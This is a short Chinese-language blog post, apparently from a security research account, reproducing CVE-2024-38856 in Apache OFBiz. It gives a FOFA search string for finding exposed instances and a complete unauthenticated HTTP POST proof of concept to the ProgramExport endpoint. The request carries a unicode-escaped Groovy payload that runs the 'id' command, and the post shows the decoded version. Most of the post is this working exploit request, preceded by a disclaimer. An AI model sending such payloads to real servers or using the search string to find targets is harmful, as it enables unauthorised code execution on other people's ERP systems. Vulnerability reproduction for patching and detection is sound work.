漏洞复现 || Apache OFBiz代码执行(CVE-2024-38856)

漏洞复现 || Apache OFBiz代码执行(CVE-2024-38856)

韩文庚 我爱林 2024-08-10 22:22

免责声明

我爱林攻防研究院的技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

漏洞描述

Apache_OFBiz是一款美国阿帕奇(Apache)基金会下的一套(ERP)系统。该系统可以提供一整套基于Java的Web应用程序组件及工具。
Apache_ OFBiz的18.12.14及之前版本均存在安全漏洞,该漏洞源于存在授权错误导致的漏洞,从而导致未经身份验证的端点可执行屏幕渲染代码。

资产确定

fofa: app="Apache_OFBiz"

漏洞复现

1.利用如下PO
C执行id得到回显

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 260


groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

注:解码后内容

throw new Exception('id'.execute().text);

如有侵权,请联系删除

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里